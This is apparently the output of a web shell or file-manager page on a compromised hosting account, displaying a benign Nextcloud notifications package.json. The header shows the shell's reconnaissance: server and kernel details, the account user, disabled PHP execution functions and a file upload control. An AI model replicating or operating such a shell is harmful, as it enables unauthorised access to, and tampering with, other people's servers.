HEX
Server: LiteSpeed
System: Linux d8 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64
User: wbwebdes (3015)
PHP: 8.1.31
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Upload Files
File: /home/wbwebdes/domains/files.wb-cloud.nl/private_html/apps/notifications/package.json
{
  "name": "notifications",
  "version": "5.0.0-dev.0",
  "private": true,
  "description": "This app provides a backend and frontend for the notification API available in Nextcloud.",
  "license": "AGPL-3.0-only",
  "author": "Joas Schilling <[email protected]>",
  "scripts": {
    "build": "vite build",
    "dev": "vite build --mode development",
    "lint": "eslint",
    "lint:fix": "eslint --fix",
    "stylelint": "stylelint src/**/*.scss src/**/*.vue",
    "stylelint:fix": "stylelint src/**/*.scss src/**/*.vue --fix",
    "watch": "vite build --mode development --watch"
  },
  "browserslist": [
    "extends @nextcloud/browserslist-config"
  ],
  "dependencies": {
    "@nextcloud/auth": "^2.4.0",
    "@nextcloud/axios": "^2.5.1",
    "@nextcloud/browser-storage": "^0.4.0",
    "@nextcloud/capabilities": "^1.2.0",
    "@nextcloud/dialogs": "^7.0.0-rc.3",
    "@nextcloud/event-bus": "^3.3.2",
    "@nextcloud/initial-state": "^3.0.0",
    "@nextcloud/l10n": "^3.3.0",
    "@nextcloud/notify_push": "^1.3.0",
    "@nextcloud/router": "^3.0.1",
    "@nextcloud/vue": "^9.0.0-rc.9",
    "howler": "^2.2.4",
    "ua-parser-js": "^2.0.5",
    "v-click-outside": "^3.2.0",
    "vue": "^3.5.21",
    "vue-material-design-icons": "^5.3.1"
  },
  "devDependencies": {
    "@nextcloud/browserslist-config": "^3.0.1",
    "@nextcloud/eslint-config": "^9.0.0-rc.5",
    "@nextcloud/stylelint-config": "^3.1.0",
    "@nextcloud/vite-config": "^2.3.5",
    "babel-loader-exclude-node-modules-except": "^1.2.1"
  },
  "engines": {
    "node": "^22.0.0",
    "npm": "^10.5.0"
  }
}